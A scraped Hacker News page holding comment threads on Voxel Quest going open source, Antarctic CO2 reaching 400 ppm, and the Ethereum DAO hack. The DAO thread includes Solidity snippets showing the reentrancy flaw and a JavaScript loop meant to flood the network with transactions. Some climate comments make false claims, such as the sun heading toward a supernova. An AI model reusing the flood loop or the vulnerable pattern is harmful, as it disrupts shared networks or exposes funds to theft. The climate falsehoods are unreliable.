If I could go back in time I would tell my former self: "Stop wasting time doing everything from the ground up. Start making games!" I believe many aspiring game developers fall into the trap of doing everything by themselves. They start building frameworks and such just for the sake of it and forget that making games requires a more widespread skill set (game design, concept art, modelling, texturing, marketing, etc.).

Your engine is a work of art. I love the approach you've taken. But from the start I always thought that you should begin working on a game as soon as possible. What's your opinion on this?

8
aavotins 2 days ago 1 reply      
I just discovered this, took my time to get acquainted with the whole situation and I must say that I'm amazed!

You did a really great job, don't be too hard on yourself. As a developer I always value tools over a product, and you went that extra mile to give the community a tool, instead of giving them a game. I think you deserve every penny, great job!

9
kvark 3 days ago 1 reply      
Jumping on OpenAI must be exciting! No matter how hard you try pushing the voxel rendering tech forward, the same effort invested in the AI has a much bigger potential. I hope you do well and enjoy it ;)
10
jsd1982 3 days ago 1 reply      
I would say that when you get asked about the project in interviews or casual conversation, don't sum it up as a failure of any sort. Speak about it as a success in research, because that's what it really is. Basically, don't downplay your accomplishments due to one metric of success/failure such as the Kickstarter or the Patreon cancellation.
11
lemiffe 3 days ago 1 reply      
The amount of positivity in this thread makes me believe in humanity again :) (coming from someone battling with depression)
12
willismichael 3 days ago 0 replies      
I would love love love to see a number of indie game studios pick up the open source engine and do crazy things with it that even Gavan didn't imagine. I'm so excited for the potential in this.
13
thedaemon 3 days ago 1 reply      
Sorry to see you go. But I'm proud that you are going out the proper way by releasing source code. Having amazing projects like this die and never see the light of day is very sad and happens too often for my liking.
14
kriro 2 days ago 1 reply      
It wasn't your intent, but to me this project and its conclusion, which is happening right now, kind of prove my base assumption that crowdfunding of creative endeavors is a very good idea if the circumstances are right. My hypothesis has always been that there will be people willing to pay other people to do interesting stuff, and that one of the major motivators is making sure those people can keep working on said stuff. In essence, I feel it's more important to communicate that the money is meant to keep the creative process running, not to buy specific products. I will pay X$ so that artist Y can keep doing what they do, but probably won't pay Z$ to buy a product from that artist, if that makes sense.

I feel like the reaction you are getting indicates that hypothesis isn't horrible. Thanks for that :)

15
nickpeterson 3 days ago 1 reply      
I haven't followed this project, and know very little about rendering, but I saw in your updates you ended up moving the voxel generation off the GPU and onto the CPU. How feasible would rendering on the CPU be for your engine? Is it highly specialized towards using GPU features, or could it be reasonably distributed across multiple traditional CPU cores?
16
iaw 3 days ago 1 reply      
I look forward to every update on Voxel Quest. I find the entire project breathtaking and beautiful. Even if I never personally play it, I am grateful that it exists.
17
Paul_S 3 days ago 0 replies      
You couldn't have handled this situation any more gracefully. I hope your engine finds a game... or a game finds your engine.
18
BatFastard 3 days ago 1 reply      
Good work on VQ! I can totally relate to what you went thru, since I went thru exactly the same thing myself 6 months ago. Glad to see you are open sourcing it; it might have legs still, though nothing can compare to the passion of a founder.
19
gabrielcsapo 3 days ago 1 reply      
Amazing work on Voxel Quest! I have been following this since the start, and it made me want to carry that same engineering excellence into my own open source projects!
20
MustardTiger 3 days ago 1 reply      
It is really nice to see someone in the game industry with honesty and integrity. But at the same time, it makes me sad that it stands out as being so incredibly rare.
21
stcredzero 3 days ago 1 reply      
Your game website looks great! What's it implemented on?
22
gldev 3 days ago 1 reply      
This is incredible, looking forward to the release of the engine. What is it that you'd be doing with OpenAI?

(:

23
dreamling 2 days ago 1 reply      
Can anyone be more even-keeled or humble than Gavan?

You impress me, sir. Keep the Patreon around for people who just want to support a seriously good person who makes fun stuff from time to time.

24
stephengillie 2 days ago 2 replies      
Wow! In 2016, to have a successful Kickstarter, you don't even need to deliver anything; you just have to be charismatic and write interesting updates for people to want to give you money.
25
ebbv 3 days ago 2 replies      
Good on you for being honest all along, for open sourcing the results, and for offering refunds.

I wish people (both people seeking funding and backers) would take more realistic and honest approaches towards crowdfunding.

26
mrfusion 3 days ago 1 reply      
Would Voxel Quest work on the Vive?
27
googletazer 3 days ago 1 reply      
Never knew about this project; the water and water physics look beautiful. Hope this ends up in good hands.
28
ironrabbit 3 days ago 1 reply      
May I ask what you'll be working on at OpenAI? (congrats, btw!)
10
Antarctic CO2 Hit 400 PPM for First Time in 4M Years scientificamerican.com
422 points by splawn  1 day ago   299 comments top 27
1
blondie9x 15 hours ago 4 replies      
We all know by now that CO2 and CH4 lead to a warmer planet. We also know what's driving greenhouse gas levels to rise across Earth. Contributors are deforestation, intensive animal farming, and primarily the combustion of carbon fossil fuels like coal, tar sands, oil, natural gas, etc. But here is the underlying problem: despite our knowing how bad things are (97+% of scientists who study this field agree we are causing the planet's climate to shift away from the temperate climate we thrived in), not enough is being done at present to truly solve the problem.

What is really disheartening, and what no one in the media or government is talking about, is that in 2015 CO2 levels rose by the largest amount in recorded human history: 3.05 ppm.

http://www.esrl.noaa.gov/gmd/ccgg/trends/gr.html

We are being lied to and misled by our governments into believing that uniform actions are being taken to save the planet for the future of man. Vested interests in the fossil fuel industry continue to drive climate change. Yes, solar energy is becoming incredibly efficient, but not enough of it is coming online in proportion to the fossil fuel capacity that persists and is still being installed annually. If we do not rally against it, our ability to live on this planet is at stake. The lives of our posterity are also at risk because of the burning. It will not be until we take extreme actions, not at a country level but as humanity together, that we will slow the burning and save ourselves.

What are these actions, you might ask, that will actually be effective? They range from banning fossil fuels entirely, a global carbon pricing system, banning deforestation, and changing human diets, to extreme uniform investment in renewable energy and potentially fourth-generation nuclear reactors, more funding for developing nations to install alternative energy sources, and shifting the transportation grid towards sustainability.

2
wallace_f 22 hours ago 5 replies      
Sometimes I feel I am the only one sceptical of the politics and alarmism surrounding climate change. I am not saying I'm skeptical that it is real (or, to be more scientifically precise, that the evidence suggests the observed increase in CO2 and temperature is most likely caused by emissions); I'm saying the politics are more complex than that.

I can think of a number of other issues that pose similar if not more immediate, or greater risks to humanity that have lower economic costs to solve.

Global warming activism also bothers me in some ways. Snobs have an absolute affinity for it, and with this cause it seems easy to create an aura of good will without actually having to follow up and do anything tangible to benefit other people. Think: buying hybrid cars that pollute more than my simple Honda. Preaching about the importance of action on this topic is also rather convenient: you don't appear to actually have to take any action. Preach about the problems of homelessness, drug abuse, crime, healthcare? There are obvious ways to actually spend your time helping the victims there. Want to hold the moral superiority card with as little effort as possible? It's super convenient.

There's also the west's party line to the rest of the world: we can afford clean energy now, and of course we want it; but even though other nations can't afford it, they're now declared immoral for not embracing it.

None of what I'm saying is that global warming isn't a worthy cause, just that the enormity and alarmism of the politics that surrounds it is cause for question.

3
jakeogh 1 day ago 4 replies      
4
curiousgeorgio 1 day ago 2 replies      
Go ahead and call me all the usual names (I don't care), but I'm a skeptic of a few things - especially things like science that has strong political influences/biases/implications - and yes, sometimes even mainstream science.

But no, I don't deny or ignore the apparent trends. That's why I also don't feel (as others have expressed here) any sense of grave alarmism or fear about the effects of warming. When climate-related deaths have steadily decreased in recent history[1], shouldn't we really be more concerned with adapting (or continuing to adapt) our own environments to deal with the earth's climate? That doesn't mean we shouldn't be environmentally conscious; just the opposite. We should be conscious of our environment, both in terms of what nature provides and in terms of how we adapt to it. Surely, very few people alive today would be suited to living in many populous places in the world without the protections afforded by human invention - today or pre-industrialization. Technological progress (much of which is a product of fossil fuels) has enabled us to live significantly longer lives, and fewer people are in climate-related danger now than ever before in history. In my view, that's a good thing.

[1] http://www.cato.org/sites/cato.org/files/wp-content/uploads/...

5
FuNe 16 hours ago 1 reply      
Let it roll.

Few in the industrialized world, if anyone, really give a shite (1). Lots of well-fed, educated westerners would lose sleep if the "free" economy were coughing, but they don't really care about this. Runaway capitalism creating the problem in the first place is also, ehm, the reason why mostly leftists seem to get it. Not that this helps. It just makes the whole thing even more partisan.

Sad truth is, the guys that are really screwed by this (so far and for the foreseeable future) are not exactly HN commentators. To them this might mean drought and death next year, but to us fat cats this apparently means a danger to economic development. We simply do not have our asses on the line (yet), which is why we can talk this to death but do _nothing_ to really prevent it. We might wake up when we start losing relatives to 50C heat waves. Who knows.

And even then, if we get it, who would actually do something? We, at a global scale, have been terrible at resolving much simpler crises. Want an example? The Ebola virus was stopped at the last minute. The Zika virus is on the loose and is going to get worse (because the Olympic games will go on at the epicenter despite hundreds of academics calling for delaying them). If nobody makes money out of it, nobody cares. Our whole system is simply dancing to that music.

So - let it roll babe.

1. <brutally honest mode on> Including my fat ass. </brutally honest mode>

6
lossolo 1 day ago 5 replies      
The worst thing is that we can't stop it once it's too late. This doesn't work like a switch. Even if we drastically cut all CO2 emissions, those levels would not drop in our lifetimes.
7
MikeHolman 1 day ago 19 replies      
I've been having a bit of an existential crisis about this recently. Is sustainability even possible anymore? We are obviously living beyond the capacity of the earth to cope right now. But is it even possible to sustain this many people (at current standards of living with foreseeable technology)?
8
combatentropy 1 day ago 0 replies      
Up from preindustrial levels of 280 ppm. More: https://en.wikipedia.org/wiki/Carbon_dioxide_in_Earth%27s_at...
9
cconroy 1 day ago 5 replies      
Forgive my ignorance on this issue, but Earth has various feedback mechanisms that forestall CO2: absorption back into rocks and consumption by flora. Is comparing CO2 levels to 4 mya disingenuous because that is just one variable we are isolating? Are we sure that rising CO2 is producing these effects attributed to climate change, and not some complicated combination of factors, as suggested by Earth's history of rising temperatures followed by cooling temperatures followed by...
10
tim333 1 day ago 4 replies      
I wonder why it was at 400ppm 4m years ago. Presumably the Earth survived the last time.
11
rwhitman 22 hours ago 0 replies      
So my question is, what density of greenhouse gasses does it take to go from "Pliocene" to "Venus"?
13
mturmon 1 day ago 0 replies      
A companion piece about crossing the 400 ppm boundary, also from the southern hemisphere: http://www.sciencemag.org/news/2016/05/atmospheric-carbon-di...
14
Fiahil 1 day ago 1 reply      
So, when should we start our preparation for the apocalypse? 2020? 2025?
15
zaro 16 hours ago 0 replies      
16
ensiferum 18 hours ago 1 reply      
I walk to work. Now are you part of the solution or part of the problem?
17
NietTim 18 hours ago 1 reply      
Woah, so that's even higher than when we had no summer in 1816 due to a volcanic eruption?
18
tr1ck5t3r 17 hours ago 2 replies      
It's nice picking your time scales and models to convey a message, as this image showing CO2 in the thousands of parts per million demonstrates: https://upload.wikimedia.org/wikipedia/commons/7/76/Phaneroz...

Now whilst it's true the sun is heating up before it goes supernova millions of years in the future, which is what a lot of the global warming fear is based on, and yes, man has contributed a small % of CO2 by releasing CO2 from fossil fuels and cutting down trees, the biggest threat facing mankind in the next 30 years is the Grand Solar Minimum.

A Grand Solar Minimum (GSM) is where the sunspots in the 11-year solar cycle reduce in frequency and strength and extreme weather becomes commonplace.

Sunspots reduce extreme weather events.

The last GSM was seen during the Dalton Minimum and Maunder Minimum, which are now classed as mini ice ages. When this occurred we had things like increased volcanic activity, which led to events like the https://en.wikipedia.org/wiki/Year_Without_a_Summer, as well as extreme cold weather, with temperatures in the UK of -37 degrees C and sea ports and the English Channel freezing over; extreme winds did things like blow copious amounts of sand inland, leading to houses being buried in places like Santon Downham, and massive inland sand dunes, which is what Thetford Forest is planted on in a bid to return the soil back to some use. Most importantly, estimates suggest around 25% of the global population died of cold and famine due to crop failures.

Today we have increased crop yields, so whilst more land has been turned over to agriculture with modern farming practices, the risk is still very much a major threat in the next few decades: a hectare will feed more mouths today than it did during the medieval ice age, and the global population has ballooned since the introduction of oil.

There are steps you can take yourself to reduce your risk, though, like buying suitable farmland whilst also investing in solar, which can power air-source heat pumps in case energy supplies & communication become disrupted due to extreme weather events.

1 watt of solar power can provide up to 3 watts of heat energy from air-source heat pumps. These are just like air-con units working in reverse.

Now whilst no one wants to create a panic, looking at the facts in context is important, and we need to bear these points in mind.

Firstly, there were no meteorological offices during the medieval ice ages, so the evidence amassed by Professor Brian Fagan, which you can read about in his book "The Little Ice Age: How Climate Made History 1300-1850", explains how man was affected; these conditions were very likely the drivers of political events that led to the French Revolution, the Irish Potato Famine and more.

It's also worth pointing out that differences within the scientific community mean no one really knows whether our manmade CO2 is going to benefit us or not, considering plants grow better with more CO2.

So there you go, a brief introduction to what TPTB are currently capitalizing on, if you fancy capitalizing on it in innovative ways yourself.

19
frogpelt 1 day ago 2 replies      
What if we (humans) don't survive this?

It won't really matter in the long run.

20
tr1ck5t3r 17 hours ago 1 reply      
For context, CO2 has been in the thousands of parts per million in the past. https://en.wikipedia.org/wiki/File:Phanerozoic_Carbon_Dioxid...

Sure, the planet is warming up as the sun slowly heads towards supernova in millions of years' time, but the biggest short-term risk we face in the next 30 years, and which could last 500 years, is the Grand Solar Minimum (GSM).

A GSM is where sunspots drop off and the planet experiences the extreme weather patterns we are seeing now. To a limited degree we see this at the start and end of each 11-year solar cycle anyway.

This last occurred during the Dalton and Maunder minimums, when 25% of the planet's population died due to famine and cold.

It triggered political events like the French Revolution, the Irish Potato Famine and more.

In the UK, temps as low as -37 degrees C were seen, with sea ports frozen and the English Channel frozen over, keeping ships locked in port or stuck out in open water. Extreme winds led to massive inland sand dunes, which is what Thetford Forest is now planted on in a bid to return the soil slowly back to use; the village of Santon Downham had so much sand deposited on it that a few houses were buried. The forest was only planted in the early 1900s.

To re-evaluate the history of geopolitical events during the medieval ice age and what you may have been taught in history, I would suggest reading the book on the mini ice age by Professor Brian Fagan, written in the '00s.

Now whilst we had no meteorological offices during the medieval ice age, we can still get valuable insight by learning from history, like what Professor Fagan has highlighted in his book. Plus, depending on what scientific models you listen to, we really don't know what the CO2 released by man from oil and cutting down trees is going to do. Plants grew better with more CO2, as seen with dinosaurs and plants during the time when CO2 was in the thousands of ppm, so our actions may actually be a blessing in disguise; but bear in mind that whilst we have higher crop yields today due to modern farming methods, the risk is now greater, as one hectare of farmland now feeds more mouths than ever before.

With that in mind, you can take steps to minimise any impact on yourself by taking up gardening and investing in things like air-source heat pumps with solar. 1W of solar energy can create up to 3W of heat energy, which is useful should you ever be cut off from the mains. Air-source heat pumps are just overpriced air-con units working in reverse.

To be forewarned is to be forearmed. So whilst TPTB like to treat people like idiots, because you then get dependent idiots, I feel it's better to tell the truth so that people can think and innovate their way out of problems, which you may be able to capitalise on in lucrative ways.

21
Shivetya 14 hours ago 0 replies      
Higher CO2 levels will increase crop yields for many types of food, and in general the levels will flip back down as the world greens to soak the CO2 up.

While some will correctly identify deforestation, animal farming, and fossil fuel usage, most overlook the cost of making concrete, and the building boom as more of the world gets richer won't help bring that down.

22
wolfram74 1 day ago 3 replies      
No no, that just won't do. Math and modeling doesn't allow us to draw conclusions about things we can't directly observe. Someone had to be there and directly count the co2 molecules with their own eyes or it doesn't count as evidence.
23
known 21 hours ago 0 replies      
OPEC should sell its oil at subsidized rates to countries that are reducing CO2 levels.
24
briandear 21 hours ago 2 replies      
"Carbon pollution" -- would we ever claim that higher oxygen levels were "Oxygen pollution."

Plant life thrives at higher CO2 levels, so calling it "pollution" is rather political.

25
skrowl 1 day ago 1 reply      
Who was taking the CO2 measurements 4 million years ago?
26
programminggeek 1 day ago 3 replies      
Assuming the fossil record and all of our measurements and assumptions about our measurements are correct. It's not like anyone was there, writing this stuff down at the time.
27
flockonus 1 day ago 0 replies      
A good and recent video explanation about Earth natural cycles https://www.youtube.com/watch?v=ztninkgZ0ws
11
Critical Update on DAO Vulnerability ethereum.org
489 points by tasti  17 hours ago   574 comments top 104
1
imglorp 15 hours ago 18 replies      
This is what concerns me about contract programming. With human contract law, if there's a minor typo or loophole, participants can generally see the spirit and intent, and at worst go to a judge who will usually enforce the intent. But with software contracts, only the characters matter and there's no intent anywhere: either you get paid or you don't.

ETH is advising, "Contract authors should ... be very careful about recursive call bugs, and listen to advice from the Ethereum contract programming community," which indicates there's some subtle behaviors to be aware of and secure contracts are apparently not easy to write.

Lest you think, "we'll just be careful, review and QA it", consider the bug[1] in the "Programming Pearls" binary search. Bentley was clearly an expert who had proven the algorithm correct and the algorithm had 20 years of careful study by thousands of professionals. Yet it had a simple overflow.

How do _you_ know your contract is secure?

1. https://research.googleblog.com/2006/06/extra-extra-read-all...
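
To make the bug class concrete, here is a minimal sketch in Solidity of the recursive-call (reentrancy) pattern in question. This is a hypothetical contract for illustration, not the DAO's actual code:

 contract VulnerableBank {
     mapping (address => uint) balances;

     function deposit() {
         balances[msg.sender] += msg.value;
     }

     function withdraw() {
         uint amount = balances[msg.sender];
         // The external call hands control to the caller's fallback
         // function before the balance is zeroed...
         if (!msg.sender.call.value(amount)()) throw;
         // ...so a malicious fallback can re-enter withdraw() and be
         // paid the same balance again.
         balances[msg.sender] = 0;
     }
 }

Moving the balances[msg.sender] = 0; line above the external call closes this particular hole.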

2
joosters 19 hours ago 19 replies      
Just remember, when the developers inevitably appear with suggestions about how to stop the hack, roll back the blockchain, or come up with other schemes to block the hackers, they are showing everyone that all the talk of blockchains being decentralised, or being beyond the control of governments or other powers... is a complete lie.

If this hack can be stopped, then it demonstrates that the currency can be manipulated, that the decentralised system is not so fault tolerant or uncensored after all, and that people out there know this.

3
sznurek 16 hours ago 6 replies      
I have a (maybe naive) question: why is the person draining ETH from DAO called "attacker"?

It seems to me that the idea behind smart contracts was to have an unambiguous description of what the participants are agreeing to. The "attacker" is doing precisely this; I have not heard of any bug in the Ethereum implementation being used here, only a "bug" in the DAO's smart contract. So he is allowed to do this, by the contract's definition.

Isn't the whole idea of that kind of contract worthless if people still roll back its effects when "it does not do what it was meant to do"?

4
nneonneo 19 hours ago 5 replies      
The provided link is just a page showing a bunch of transactions. For someone like me, who is not so intimate with the Ethereum terminology in use (but who is still interested in the DAO, as an observer), could someone provide a layman's explanation of what's going on?

Somewhat more specifically, I'm wondering the following:

- At a high level, what does this attack actually consist of?

- How does ethereum "go missing" in a distributed blockchain, where you can see all the transaction endpoints?

- Who loses and who gains from an attack of this scale?

- How severe could this attack be - does it pose an existential threat to The DAO (or Ethereum, more broadly)?

- How is this attack being perpetrated? Has the attack vector been previously anticipated? Why is this unexpected?

5
zepolud 16 hours ago 2 replies      
"They say 'there are no atheists in foxholes.' Perhaps, then, there are also no libertarians in crises." [1]

[1] https://www.hks.harvard.edu/fs/jfrankel/CatoRespCrisesJun07+...

6
pjc50 18 hours ago 4 replies      
Well, that was kind of inevitable. Building a financial system out of pure code with no humans in the loop and no legal structure is building a self-distributing bug bounty piñata. It's decentralised, so there's nobody who can throw a breaker and shout "stop!"; cryptocurrency transactions are irreversible, so thefts are permanent; and it's somewhat anonymous, so thefts are hard to trace.

It also demonstrates that being first to market trumps security. If the DAO had waited until a full formal verification system existed and had been applied, it wouldn't have been able to pick up the $160m of overenthusiastic money keen to rush headlong into the hands of hackers.

7
tomp 16 hours ago 1 reply      
Congratulations! A month after the first real test of the "distributed", "safe" cryptocurrency featuring "enforceable" contracts, it turns out it's none of these.
8
SakiWatanabe 19 hours ago 4 replies      
developer asks token holders to spam the network to delay the attack o.O

griff [10:05 AM] @channel The DAO is being attacked. It has been going on for 3-4 hours, it is draining ETH at a rapid rate. This is not a drill.

You can help: If anyone knows who has the split proposals Congo Split, Beer Split and FUN-SPLT-42, please DM me. We need their help! If you want to help, you can vote yes on those aforementioned split proposals, especially people whose tokens are blocked because they voted for Prop 43 (the music app one).

We need to spam the network so that we can mount a counter attack; all the brightest minds in the Ethereum world are in on this. Please use this to spam the chain:

 for (var i = 0; i < 100; i++) {
   eth.sendTransaction({
     from: eth.accounts[4],
     gas: 2300000,
     gasPrice: web3.toWei(20, 'shannon'),
     data: '0x5b620186a05a131560135760016020526000565b600080601f600039601f565b6000f3'
   })
 }

9
vessenes 15 hours ago 1 reply      
I wrote this attack up last week -- a solidity dev initially noticed this bug, but seemed to think it wasn't a big deal. http://vessenes.com/more-ethereum-attacks-race-to-empty-is-t...

The comments here are generally spot on; it's a combination of problems -- upgradability is designed to be hard because other people's money shouldn't be easy to steal, programmers are not used to making whole programs reentrant, existing documentation underplays risks, or alternately just tells people to do the wrong thing.

A better language would help, better documentation would help, better standards about how to write the programs would also help.

And, of course, more eyes are helpful. I'm an outsider to Ethereum, and got a very polite response, overall the community has been great. That said, there just aren't enough people looking at these contracts right now.

10
themgt 15 hours ago 1 reply      
Reading their blog about "smart contract security" [1] is just mind-blowing. Like, I thought that was the core of the product, but somehow they've designed a language which makes it extremely difficult to not get your smart contract hacked? And now the solution to this situation is going to be better documentation and IDEs? Oy.

[1] https://blog.ethereum.org/2016/06/10/smart-contract-security...

11
Taek 11 hours ago 2 replies      
There's a pretty significant lesson here, and it's not that the DAO authors were careless. They were, and so were all of the investors, but the core problem is not the DAO.

It's Solidity. It's the Ethereum virtual machine. Even today, security vulnerabilities are being found in code strategies that are generally considered 'best practice'.

Writing a safe smart contract on Ethereum is extremely difficult, and most people playing with Ethereum don't seem to realize this. There's a pretty well understood maxim, "don't roll your own crypto." Ethereum's smart contracts ARE cryptography, and their safety depends on implementation details that are completely hidden from users during tutorials, and that even the language designers are only still discovering.

This article does a good job of demonstrating that safety is really hard: https://blog.ethereum.org/2016/06/10/smart-contract-security...

And it's one of the major reasons that the Bitcoin devs have not been excited about Ethereum. It's a project whose ambitions have outpaced our ability to engineer safely.

One day we can have safe smart contracts. But the Ethereum of today is not well designed, and is not a good foundation for smart contracts. A simple hardfork to fix this DAO mess isn't going to be enough. The whole virtual machine needs to be redesigned.

And my money is quite seriously on Bitcoin figuring out the safe way to do smart contracts faster than anyone else. The vast majority of experienced experts in this space are still spending the majority of their time on Bitcoin. As popular as Ethereum has become, Bitcoin still owns the mindshare, and there are good reasons that Bitcoin has chosen not to pursue smart contracts at this time.

12
Animats 7 hours ago 0 replies      
Well, their language is disappointing. They allow programs to ignore function return values, a misfeature inherited from C which has no place in a contracts language.

Then there's the possibility of forcing early program termination via stack overflows.[1] Having to protect against that inside each program is just silly. The contract engine should have been designed so that if a contract program crashes, anything it did is rolled back.

[1] http://hackingdistributed.com/2016/06/16/scanning-live-ether...
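
To illustrate the first point, a minimal hypothetical Solidity snippet (not taken from the DAO or any real contract):

 contract Example {
     function pay(address recipient, uint amount) {
         recipient.send(amount);             // compiles fine; a failed send is silently ignored
     }

     function paySafely(address recipient, uint amount) {
         if (!recipient.send(amount)) throw; // a failed send at least aborts the transaction
     }
 }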

13
benmmurphy 17 hours ago 1 reply      
My guess at how the attackers are doing it:

They are calling splitDAO:

https://github.com/slockit/DAO/blob/develop/DAO.sol#L618

splitDAO calls withdrawRewardFor, which ends up calling back into the user's contract.

https://github.com/slockit/DAO/blob/develop/DAO.sol#L686

 withdrawRewardFor(msg.sender); // be nice, and get his rewards
 totalSupply -= balances[msg.sender];
 balances[msg.sender] = 0;
 paidOut[msg.sender] = 0;
The state is modified after the callback, in particular the balances variable.

However, earlier in the function it moves funds to a new DAO based on the balances variable:

 // Move ether and assign new Tokens
 uint fundsToBeMoved = (balances[msg.sender] * p.splitData[0].splitBalance) / p.splitData[0].totalSupply;
 if (p.splitData[0].newDAO.createTokenProxy.value(fundsToBeMoved)(msg.sender) == false)
So presumably an attacker can call splitDAO and then recursively call splitDAO, and the funds will be transferred twice. There are also some complications around rewardToken, because that state is modified before the callback, but apparently it is all zero at the moment.
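
A rough sketch of the shape such an attack contract might take, assuming the DAO interface from the snippets above (proposal setup and curator details are simplified; this is not the actual exploit code):

 contract DAO {
     function splitDAO(uint _proposalID, address _newCurator) returns (bool _success);
 }

 contract Drainer {
     DAO dao;
     uint proposalID;
     uint depth;

     function Drainer(address _dao, uint _proposalID) {
         dao = DAO(_dao);
         proposalID = _proposalID;
     }

     function attack() {
         depth = 0;
         dao.splitDAO(proposalID, address(this));
     }

     // The reward payout inside splitDAO sends ether here, invoking this
     // fallback, which re-enters splitDAO before balances[msg.sender] has
     // been zeroed, so fundsToBeMoved is computed from the same balance again.
     function () {
         if (depth++ < 20) {
             dao.splitDAO(proposalID, address(this));
         }
     }
 }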

If this is the bug the attackers are exploiting, then maybe if rewards were generated it would stop the drain of funds.

However, the fact that the draining is still going on, that the DAO people are likely to know how it is being done, and that it hasn't been stopped reduces my confidence that this is how the attackers are doing it.

EDIT: To add, I don't think you can cash out the new DAO for 28 days, so this is probably not how the attackers are doing it.

EDIT: update again.

https://blog.slock.it/dao-security-advisory-live-updates-2a0...

'It would appear the attacker has moved the stolen ether to a child DAO, which means that the funds be moved for at least 27 days.'

-> I'm now fairly confident this is how the attack worked :)

14
Tinyyy 16 hours ago 6 replies      
> (The soft fork) will later be followed up by a hard fork which will give token holders the ability to recover their ether.

Does this mean that transactions are going to be rolled back?

If so, are they planning to do this everytime a vulnerability is exploited? Is The DAO too big to fail?

15
defenestration 14 hours ago 1 reply      
Some numbers to get a grasp of the scale:

> There is 2,436,828 Ethereum in the account of the attacker (see: https://etherchain.org/account/0x304a554a310c7e546dfe434669c...)

> That's about 3% of all Ethereum mined (source: http://coinmarketcap.com/currencies/ethereum/)

> The Ethereum in the account of the attacker has a value of $41 million

> The volume is about 30% of all Ethereum trade today

16
benmmurphy 18 hours ago 0 replies      
I'm no expert on Ethereum code (just started looking at it now), but it looks like the DAO didn't look for similar issues when making the latest security fix.

https://github.com/slockit/DAO/commit/f01f3bd8df5e1e222dde62...

   reward = rewardAccount.balance < reward ? rewardAccount.balance : reward;
 + paidOut[_account] += reward;
   if (!rewardAccount.payOut(_account, reward)) throw;
 - paidOut[_account] += reward;
 + return true;
 }
But if you grep for payOut, you see a similar broken pattern below, where the state is modified after the call instead of before it:

 if (_toMembers) {
     if (!DAOrewardAccount.payOut(dao.rewardAccount(), reward)) throw;
 } else {
     if (!DAOrewardAccount.payOut(dao, reward)) throw;
 }
 DAOpaidOut[msg.sender] += reward;
But apparently this is not how the DAO is being drained, because there are no rewards at the moment.
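
For contrast, a rearranged sketch of the same fragment with the state update moved before the external call (the ordering used in the fix above; a throw still reverts the state change on failure):

 DAOpaidOut[msg.sender] += reward; // effects first
 if (_toMembers) {
     if (!DAOrewardAccount.payOut(dao.rewardAccount(), reward)) throw;
 } else {
     if (!DAOrewardAccount.payOut(dao, reward)) throw;
 } // external calls last: re-entering code now sees the updated state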

this is a good summary of the problem:

https://blog.ethereum.org/2016/06/10/smart-contract-security...

and it should scare you about the security of smart contracts based on Ethereum.

EDIT: mm.. maybe it is safe, because the addresses dao / dao.rewardAccount() can't be controlled by attackers.

17
walrus01 19 hours ago 4 replies      
It's almost as if a cryptocurrency system used by the grey market and black market sections of the internet contained actual blackhats. What a surprise.

Much as I hate to link to reddit, for effective and biting criticism of cryptocurrencies: http://reddit.com/r/buttcoin

18
lordnacho 17 hours ago 1 reply      
I recall reading in the Bitcoin docs that the Forth-like scripting language was non-Turing complete. In addition, nothing particularly complex was using the scripting at the time.

I guess this sort of thing would be the reason. Finding bugs in ordinary software, where the bugs are accidents, is one thing. It's hard.

Another thing entirely is where you are looking for adversarial bugs. Just look at security articles that appear on HN now and again. They're incredibly complex, and it's not like you can turn off the firehose. When you fix one gap, someone will find another.

I haven't done a lot of reading on ETH, but I would imagine the smart thing to do would be to have some small number of contract types that a lot of people can stare at and try to break. The more attention is distributed among various bespoke contracts, the harder it gets to secure them.

It's like everyone building their own awesome cars, with special bells and whistles, and then asking these non-security engineers to design a lock. Everyone will end up re-learning some painful lessons.

19
narrator 18 hours ago 3 replies      
I always thought that Ethereum had a huge attack surface. Each script has to be security audited, etc. That's the thing about Bitcoin: it's as simple as possible while still being secure and useful, and it has been beaten up and audited by the best security pros in the world. Distributed systems are not easy. Secure distributed systems with Byzantine fault tolerance are even harder. Ethereum is just trying to do too much.
20
cplease 14 hours ago 1 reply      
Oh, nobody saw that coming. Completely unforeseeable.

What other mature, ready-for-primetime autonomous altcoin networks can I dump my savings into for no apparent reason?

Edit: "DAO token holders and ethereum users should sit tight and remain calm. Exchanges should feel safe in resuming trading ETH."

No they shouldn't. They should be running screaming for the exit doors. Less than two months after the launch of this mysterious "DAO" with an entirely bogus value proposition, 1/3 of the money put in, worth presently some $39 million USD in real money, has been confirmed stolen.

21
ThomasRooney 19 hours ago 3 replies      
I started archiving the slock.it #general slack channel when this attack began. This is where most of the discussion has been taking place. Here's up until a few minutes ago:

http://pastebin.com/DykumjLs

22
tankenmate 17 hours ago 1 reply      
Use this link because the ethereum blog is suffering.

http://pastebin.com/xW16N7Ye

23
spdionis 16 hours ago 4 replies      
Can someone eli5 what DAO and ethereum are?
24
peterbonney 11 hours ago 0 replies      
Interesting side point to this: some people wondered why DAO units immediately traded at a discount and many thought it presented an "arbitrage" opportunity, but this hack illustrates why it was always rational that the DAO should trade at less than the redemption value. The value of DAO units is capped on the upside, but not on the downside, and this hack is one way (of many) that downside risk could manifest itself.
25
zby 16 hours ago 0 replies      
The interesting question for now is: is what that unknown party is doing illegal? If The DAO code is the contract, then using the code in this way would be like using some fine-print clauses in a contract.
26
stevebmark 10 hours ago 0 replies      
Am I misreading this? The suggested solution is to hard-code an account hash into the source of Ethereum? If that's the case, how can that be taken seriously? It sounds like Ethereum should just start over entirely. Part I of the experiment failed.
27
Quanttek 19 hours ago 2 replies      
I remember reading somewhere that the DAO was basically hastily coded under pressure, without any QA or security audit, so that explains things.
28
curiousgal 17 hours ago 1 reply      
It's not as bad as it seems. The hackers have their ETH locked in a child DAO, so they will not be able to get the ETH out for a long time, by which point a fix will be issued. The entire Ethereum ecosystem is collaborating on a solution.

0.https://www.reddit.com/r/ethereum/comments/4oiib4/dao_is_saf...

29
yonilevy 13 hours ago 1 reply      
Just an idea - why not contact the attacker (via a public message) and offer him or her a deal: they get to keep, say, 1% of the stolen amount, provided they upload a smart contract that guarantees the money is sent from the stolen account to a "trusted" address (from where it will go to DAO 2.0). That way everyone wins: the hacker gets paid a fair amount for finding the security hole, and there are no messy forks.
30
vijayboyapati 11 hours ago 0 replies      
Because smart contracts are (often) contractual obligations on real world things, they only hold as much power as the apparatus of coercion (usually the State) will allow them to hold. That is, you must trust the political authority first and foremost before you trust the contract. This is very different to bitcoin, which operates purely in the digital realm, where you can trust the ownership of the btc without requiring trust of the political authority. So bitcoin solves a trust problem and this makes the less efficient distributed architecture worthwhile (it would be much cheaper and far faster to operate a digital currency in a centralized way). But if you have to trust the political authority for digital contracts on physical goods, what is the point of the extra cost? I'm dubious there is any real benefit.
31
jbpetersen 16 hours ago 1 reply      
